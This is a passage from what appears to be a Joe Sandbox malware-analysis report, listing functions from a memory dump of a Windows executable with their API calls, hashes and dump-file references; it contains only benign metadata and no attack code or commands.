                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                          • Instruction ID: 4b18b45d09d0498036a4d6381b31eac2dd396e78b8424f61ed8f3e9ea8334137
                                                                          • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                          • Instruction Fuzzy Hash: 19022D71E012299FDF14CFA9D9806ADBBF1EF48324F258169D919EB380D734AE41DB90
                                                                          Function 00F1AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00F1AF35
                                                                          • GetNumberFormatW.KERNEL32(00000400,00000000,?,00F3E72C,?,?), ref: 00F1AF84
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: FormatInfoLocaleNumber
                                                                          • String ID:
                                                                          • API String ID: 2169056816-0
                                                                          • Opcode ID: 7a092c5bbeef44f43730350fd33c1c5d0882afe762aa4661a19a25ef4a8d405c
                                                                          • Instruction ID: 0b0fb39a8e0e1e7feb872e34542643f70f4af917b7f7ad2ca6b2f1462dbeb0ee
                                                                          • Opcode Fuzzy Hash: 7a092c5bbeef44f43730350fd33c1c5d0882afe762aa4661a19a25ef4a8d405c
                                                                          • Instruction Fuzzy Hash: 91017C3A60031CAAD710DF64EC49F9A77BCEF08720F404022FB15A7191E370AA59DBA5
                                                                          Function 00F06C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00F06DDF,00000000,00000400), ref: 00F06C74
                                                                          • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00F06C95
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFormatLastMessage
                                                                          • String ID:
                                                                          • API String ID: 3479602957-0
                                                                          • Opcode ID: c3af3c1a149dbe0d896dffeaa60a70babb4d02306d7c616e5aac68be95ae01af
                                                                          • Instruction ID: b855ba0e086dc361598a2a18484db0e46f8080754aa8661cac20ee8ea20177d3
                                                                          • Opcode Fuzzy Hash: c3af3c1a149dbe0d896dffeaa60a70babb4d02306d7c616e5aac68be95ae01af
                                                                          • Instruction Fuzzy Hash: BDD0C971344300BFFA154B619D46F2ABB9ABF45B6AF18C404B795E80E0CAB49524B629
                                                                          Function 00F319F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00F319EF,?,?,00000008,?,?,00F3168F,00000000), ref: 00F31C21
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionRaise
                                                                          • String ID:
                                                                          • API String ID: 3997070919-0
                                                                          • Opcode ID: e98e18569e0268541a76429753e54127882b62c2b865bd8ea2ebb2723da5547b
                                                                          • Instruction ID: 1d5b247db99d7d3d9ccd166830015caa16c3d5eca92a4e1c1f260243e10d420c
                                                                          • Opcode Fuzzy Hash: e98e18569e0268541a76429753e54127882b62c2b865bd8ea2ebb2723da5547b
                                                                          • Instruction Fuzzy Hash: C8B13C32610609DFD719CF28C48ABA5BBE0FF45375F258658E899CF2A1C335E992DB40
                                                                          Function 00F1F654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00F1F66A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: FeaturePresentProcessor
                                                                          • String ID:
                                                                          • API String ID: 2325560087-0
                                                                          • Opcode ID: a62596f3242c8bbf4169e8dbaa3b3e3407a53e34d7c123385e450e66f8095954
                                                                          • Instruction ID: e9e34dc56ed89baa09c73af0a58799233debff21c35c917b071a6bb8d855768c
                                                                          • Opcode Fuzzy Hash: a62596f3242c8bbf4169e8dbaa3b3e3407a53e34d7c123385e450e66f8095954
                                                                          • Instruction Fuzzy Hash: C15180B1E006198FEB24CF58E9817EABBF5FB48364F24853AD421EB390D3749944DB50
                                                                          Function 00F0B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetVersionExW.KERNEL32(?), ref: 00F0B16B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Version
                                                                          • String ID:
                                                                          • API String ID: 1889659487-0
                                                                          • Opcode ID: ed388cc3442cc1358bd70c282f3f2c8724cf1c0afef694d176d9b538a25fccf7
                                                                          • Instruction ID: a70005bf0c4f6783863e3b70b1d39f0b7ee5826665200e8d6ad762128cc99fe3
                                                                          • Opcode Fuzzy Hash: ed388cc3442cc1358bd70c282f3f2c8724cf1c0afef694d176d9b538a25fccf7
                                                                          • Instruction Fuzzy Hash: 5DF030B9D0020C8FDB28CB18ED916D977F2FBA9365F104395D91593390C370A9C0AE60
                                                                          Function 00F040FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: gj
                                                                          • API String ID: 0-4203073231
                                                                          • Opcode ID: 303f8e9905649584f6bc956303e6360b96cc0ee048bee7e0d6ca9dd6b7e58301
                                                                          • Instruction ID: f5768c3af92386a3e78c216d7e4dacd1a90d48eb8b9d3e29281d174cb10d6278
                                                                          • Opcode Fuzzy Hash: 303f8e9905649584f6bc956303e6360b96cc0ee048bee7e0d6ca9dd6b7e58301
                                                                          • Instruction Fuzzy Hash: 1FC147B6A183418FC354CF29D880A5AFBE1BFC8308F19892DE998D7311D734E945DB96
                                                                          Function 00F1F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00F1F3A5), ref: 00F1F9DA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: 78f62bab2f082bd5e5b6a450bdefc51f22f13cc056f8ff41e68226e8d0834d48
                                                                          • Instruction ID: e28b2e239ff6bc48d9f8118a754018046daba2bd7e6c1ad2301d8e11f4843b93
                                                                          • Opcode Fuzzy Hash: 78f62bab2f082bd5e5b6a450bdefc51f22f13cc056f8ff41e68226e8d0834d48
                                                                          • Instruction Fuzzy Hash:
                                                                          Function 00F2C030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: HeapProcess
                                                                          • String ID:
                                                                          • API String ID: 54951025-0
                                                                          • Opcode ID: 325f0d2e99bca55e7df95eb8b84b640545aeb5d0a1287367ad15292b8de45e8e
                                                                          • Instruction ID: f708cbf26282095d02f7dce6e092376a945413890e2e16718bb32bd59b829f78
                                                                          • Opcode Fuzzy Hash: 325f0d2e99bca55e7df95eb8b84b640545aeb5d0a1287367ad15292b8de45e8e
                                                                          • Instruction Fuzzy Hash: E1A02230A02208CFC380CF30EF0C30C3BEAAB002E2308002AE008C0030EBF080A0BB00
                                                                          Function 00F162CA Relevance: .8, Instructions: 829COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                          • Instruction ID: 8858292ef6a84555c72c29986d369f6501c6b62cad89583caefdd333dcac77d5
                                                                          • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                          • Instruction Fuzzy Hash: DD62D8716047849FCB25CF28C8906F9BBE1AF95314F08896DD8DACB346D734E985DB11
                                                                          Function 00F177EF Relevance: .8, Instructions: 817COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                          • Instruction ID: a7bf48066c4ec26b32e3d999246be21d03df04f0582a356531e2ffbe580a5c5e
                                                                          • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                          • Instruction Fuzzy Hash: 7B62F671A0C3858FCB15DF28C8806E9BBF1BF95314F18896DE89A8B346D730E985DB51
                                                                          Function 00F0F461 Relevance: .7, Instructions: 694COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                          • Instruction ID: 14cee8ec28eca295d5e25920938044c1417c2e48823981279dc6e33330d1b250
                                                                          • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                          • Instruction Fuzzy Hash: B4525B72A087018FC718CF19C891A6AF7E1FFCC314F498A2DE5959B255D334EA19CB86
                                                                          Function 00F17153 Relevance: .5, Instructions: 536COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ee8ad16e27d2d6b66886b2b27b7d8a8f57fcf248618cad35f6e563309b4cf835
                                                                          • Instruction ID: fab1a5014ef0a1be30b76f3839588b07b5fe9581e0da82756a54f44be84c4aef
                                                                          • Opcode Fuzzy Hash: ee8ad16e27d2d6b66886b2b27b7d8a8f57fcf248618cad35f6e563309b4cf835
                                                                          • Instruction Fuzzy Hash: 2A12C2B16087069FC718DF28C890AB9B7F1FF94304F14892EE99AC7780D734A995EB45
                                                                          Function 00F0C426 Relevance: .5, Instructions: 454COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a70f10b21218f8dd843d85c3aacaf4aa1af71fb079426bed8860cc89df8a3fe3
                                                                          • Instruction ID: bf61d0ba56e279728353cda4c643fa6d6d3cfe132c060461f6556272002c9254
                                                                          • Opcode Fuzzy Hash: a70f10b21218f8dd843d85c3aacaf4aa1af71fb079426bed8860cc89df8a3fe3
                                                                          • Instruction Fuzzy Hash: EEF1AE71A083018FC724CF29C48462ABBE5EF89364F154B2EF4C9D7291D631E945FB86
                                                                          Function 00F16CDC Relevance: .3, Instructions: 343COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog
                                                                          • String ID:
                                                                          • API String ID: 3519838083-0
                                                                          • Opcode ID: a0c0a0b98c0135959158553d836eb4835e99038b5e68f8b94ae78b78687677fc
                                                                          • Instruction ID: 5bec49e12bb4dc2f76deb2b1d8914849e8002c6229f4dd2c5480dea3929566f8
                                                                          • Opcode Fuzzy Hash: a0c0a0b98c0135959158553d836eb4835e99038b5e68f8b94ae78b78687677fc
                                                                          • Instruction Fuzzy Hash: 2FD1B571A083818FDB14DF28D84079BBBE1BF89318F04456DE889DB242D774ED85DB5A
                                                                          Function 00F0E9B7 Relevance: .3, Instructions: 320COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a9d0bcc457d9607fbfe12a64817dc0aac34bad4c550066ca9144464df458c07c
                                                                          • Instruction ID: b56ecdab5d03c863da32f2606c462a691783cbdea54a9478aeeff505155c9382
                                                                          • Opcode Fuzzy Hash: a9d0bcc457d9607fbfe12a64817dc0aac34bad4c550066ca9144464df458c07c
                                                                          • Instruction Fuzzy Hash: E9E14D795083948FD314CF29D89046ABFF0AF9A700F49095EF9D4D7352C235EA19EBA2
                                                                          Function 00F14088 Relevance: .3, Instructions: 270COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                          • Instruction ID: edb5a21288aa5c88f5d40fc40da6ae08a561284e38f428f309945be5ef67961a
                                                                          • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                          • Instruction Fuzzy Hash: 5C9155B16003469BDB24EB64DC94BFA77D4EBE0300F10092DE996872C2DA78A5C6F752
                                                                          Function 00F143BF Relevance: .2, Instructions: 243COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
